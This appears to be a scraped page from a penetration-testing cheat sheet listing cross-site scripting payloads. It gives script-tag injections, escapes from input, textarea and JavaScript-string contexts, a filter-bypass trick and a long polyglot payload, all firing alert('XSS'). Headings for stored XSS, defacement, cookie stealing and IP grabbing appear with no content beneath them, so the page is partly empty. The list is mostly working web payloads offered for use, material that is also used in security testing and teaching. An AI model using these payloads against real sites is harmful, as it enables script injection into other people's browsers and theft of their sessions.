XSS
Payloads
# Standard XSS Payload
<script>alert('XSS');</script>
# Input tag escape
"><script>alert('XSS');</script>
# Escape textarea tag
</textarea><script>alert('XSS');</script>
# Escape Javascript code
';alert('XSS');//
# Bypass filters that strip out malicious words such like "script"
<sscriptcript>alert('XSS');</sscriptcript>
# Polygot payload (Can bypass multiple filters)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS)//>\x3ePayload List
Stored XSS
Defacing HTML Titles



Payloads for changing Element ID
Cookie Stealing





Reflected XSS


Grabbing machine IP

Further Reading
Last updated